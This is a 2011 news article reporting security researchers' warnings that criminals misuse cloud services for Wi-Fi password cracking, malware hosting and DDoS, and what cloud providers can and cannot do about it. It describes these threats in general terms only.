Cloud a haven for cybercriminals
February 7, 2011A security researcher last month warned that cloud services can be exploited for criminal purposes. At the Black Hat security conference, Thomas Roth said he was planning to release an open source kit which will enable users to crack Wi-Fi passwords by leveraging the computing power of the Amazon Web Services (AWS) cloud running on GPU-based servers.
There are other similar tools that use leasable cloud services to crack Wi-Fi security authentication mechanisms, such as Wi-Fi Protected Access (WPA), using the cloud infrastructure’s processor cluster to run dictionary attacks.
According to security players, the accessibility of such tools is not uncommon.
In an e-mail interview, Ronnie Ng, manager of systems engineering at Symantec Singapore, pointed to a 2009 blog post which noted that a Web site was purportedly selling automated Wi-Fi Protected Access (WPA) password crackers that used cloud computing technology.
The site allowed anyone to "pay a token sum of US$34 to rent time on a large 400-node computer cluster and check over 135,000,000 potential passwords against a targeted victim in just 20 minutes". The Symantec blogger noted that even without technical knowledge, a malicious attacker would be able to obtain and use the password for illegal means such as to spy on the victim’s network.
Magnus Kalkuhl, director of Kaspersky Labs’s Europe global research and analysis team, also noted that cloud infrastructure has been misused for hosting malware. He told ZDNet Asia in an e-mail that there have been instances in the past where Amazon Elastic Compute Cloud (Amazon EC2) was used as malware hosting platforms, including a recent instance in which a trojan was spread using Rapidshare.
Kalkuhl noted that, in fact, certain malware "for years" have already been running on their own cloud. "Actually all DDoS (distributed denial-of-service) attacks and spamming services offered by cybercriminals are based on a cloud architecture, [which is] their own botnets made of thousands or even millions of infected PCs."
In an e-mail interview, Paul Ducklin, head of technology for Sophos Asia-Pacific, added: "Almost anything you can do in the way of cybercrime on a standalone PC can be achieved through the cloud."
In fact, he noted that cloud-based services such as social networks can make cybercrime easier.
Spams and scams can spread on Facebook, for instance, without ever raising an alarm on the user’s PC, Ducklin explained, noting that the benefit of distributing content automatically from many users to many users over social networks can work to the advantage of cybercriminals.
Responsibility on service providers
With more users moving onto the cloud platform, Ng cautioned that criminal activities on the cloud will rise.
"The cloud’s growing popularity will increase the risk of [users] being targeted by cybercriminals," he said. He noted that the onus is on cloud service providers to "demonstrate due diligence" in ensuring organizations that lease their services do not engage in malicious activities.
Ducklin concurred: "Why would [businesses] be willing to store [their] data with a cloud provider that also allows cybercrooks and dodgy operators to use its services?"
Citing the case of DDoS attacks related to Wikileaks, he stressed that other users can be affected if a service provider is indiscriminate about whom it provides its services to.
"If your cloud provider services a wide range of businesses, the chance that one of them might become the victim of vigilantes carrying out a DDoS attack is higher," Ducklin said. "You might lose quality of service due to sociopolitical problems suffered by someone else ‘in your cloud’."
But while the security players agreed that cloud service providers should be vigilant when providing services, they noted that ensuring total control is not easily achieved.
Kalkuhl said concerns over privacy limit service providers’ ability to have complete control.
"Major cloud service providers like Amazon may check outgoing traffic for suspicious patterns such as DDoS attacks against other machines, [as well as instruct] customers who use virtual machines to conduct system penetration tests to inform the service provider in advance.
"However, it is not possible for the providers to scan the content of [network] traffic for keywords or malware signatures, for instance," he explained. "Neither are they allowed to scan or manually check what files are stored in a provided [cloud] environment. Otherwise, people would lose their trust in cloud providers and the whole business model would be put at risk."